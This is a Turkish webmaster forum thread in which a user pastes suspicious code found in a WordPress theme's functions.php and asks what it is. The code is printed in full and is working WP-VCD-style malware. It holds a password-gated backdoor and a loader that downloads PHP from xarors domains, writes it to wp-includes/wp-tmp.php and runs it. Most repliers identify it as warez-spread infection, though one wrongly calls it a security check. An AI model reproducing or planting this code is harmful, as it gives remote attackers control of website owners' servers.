lostyazilim
tr.link

ThemeForest'ın ücretsiz dağıttığı Axen'da açık mı var?

7 Mesajlar 1.326 Okunma
lstbozum
tr.link

Durotan Durotan WM Aracı Kullanıcı
  • Üyelik 28.02.2014
  • Yaş/Cinsiyet 29 / E
  • Meslek 3D Sanatçı
  • Konum Kocaeli
  • Ad Soyad F** T**
  • Mesajlar 1676
  • Beğeniler 204 / 340
  • Ticaret 2, (%100)
Düzeltme: Sorun Axen'dan kaynaklı değilmiş.

Merhaba arkadaşlar. Geçtiğimiz aylarda bildiğiniz gibi ThemeForest, Axen temasını ücretsiz dağıttı.

Temanın functions.php dosyasında gezinirken bazı kodlara denk geldim. Bu nedir?

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'ad3b67da5b989a6e8c20fa3980ebfd9c'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{






case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{

$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}


}
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{

if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}


}
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}








$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, " {
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, " }
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}


$wp_auth_key='a64bc109310479ba6c426978e251fec8';
if (($tmpcontent = @file_get_contents("http://www.xarors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.xarors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}


elseif ($tmpcontent = @file_get_contents("http://www.xarors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://www.xarors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

}





}
}


xarors.com diye bir siteyle iletişime mi geçiyor, bilenler var mı?
 

 

wmaraci
reklam

Soickan Soickan WM Aracı Kullanıcı
  • Üyelik 18.10.2013
  • Yaş/Cinsiyet 39 / E
  • Meslek Webmaster
  • Konum İzmir
  • Ad Soyad S** S**
  • Mesajlar 37
  • Beğeniler 0 / 16
  • Ticaret 0, (%0)
O siteden kod doğrulaması yapıyor. Key değişirse onay vermemesi için. Basit bir Güvenlik kontrolü.
 

 

Durotan Durotan WM Aracı Kullanıcı
  • Üyelik 28.02.2014
  • Yaş/Cinsiyet 29 / E
  • Meslek 3D Sanatçı
  • Konum Kocaeli
  • Ad Soyad F** T**
  • Mesajlar 1676
  • Beğeniler 204 / 340
  • Ticaret 2, (%100)
Soickan Kodlardaki site çalışmıyor ama?
 

 

wpuzman wpuzman WordPress Developer Kullanıcı
  • Üyelik 13.01.2017
  • Yaş/Cinsiyet 33 / E
  • Meslek Yazılım
  • Konum Trabzon
  • Ad Soyad B** M**
  • Mesajlar 2771
  • Beğeniler 293 / 949
  • Ticaret 33, (%100)
Bildiğin warez kodu bu. Eğer sunucuda warez bir eklenti veya tema kullandıysanız bütün temalara bulaştırır.
Durotan

kişi bu mesajı beğendi.

wmaraci
wmaraci

LitmuS LitmuS WM Aracı Kullanıcı
  • Üyelik 18.04.2016
  • Yaş/Cinsiyet 38 / E
  • Meslek Dijital Web Hizmetleri
  • Konum İzmir
  • Ad Soyad H** Ö**
  • Mesajlar 360
  • Beğeniler 93 / 93
  • Ticaret 10, (%100)
Sunucuda olmasına gerek yok bilgisayarda aynı klasörde olan diğer temalarada bulaştırır.
Tüm functions.php 'leri kontrol et ve warez eklenti veya tema kullanmamaya özen gösterin.
Bu aralar bu kod baya yaygın bir çok müşteri geliyor bununla ilgili.
Durotan

kişi bu mesajı beğendi.

Detaylar iftardan sonra 🟢

Durotan Durotan WM Aracı Kullanıcı
  • Üyelik 28.02.2014
  • Yaş/Cinsiyet 29 / E
  • Meslek 3D Sanatçı
  • Konum Kocaeli
  • Ad Soyad F** T**
  • Mesajlar 1676
  • Beğeniler 204 / 340
  • Ticaret 2, (%100)
wpuzman LitmuS Localhost'ta başka bir tema kullandım warez, muhtemelen ondandır herhalde. Çünkü child tema oluşturuyorum, functions.php'ye sadece child tema için kodları ekliyorum. Dosyayı sonraki açışımda bu kodlarla karşılaşıyorum.
 

 

Soickan Soickan WM Aracı Kullanıcı
  • Üyelik 18.10.2013
  • Yaş/Cinsiyet 39 / E
  • Meslek Webmaster
  • Konum İzmir
  • Ad Soyad S** S**
  • Mesajlar 37
  • Beğeniler 0 / 16
  • Ticaret 0, (%0)

Durotan adlı üyeden alıntı

Soickan Kodlardaki site çalışmıyor ama?




İleride code.php de değişiklik olurmu bilemem.
Durotan

kişi bu mesajı beğendi.

wmaraci
wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al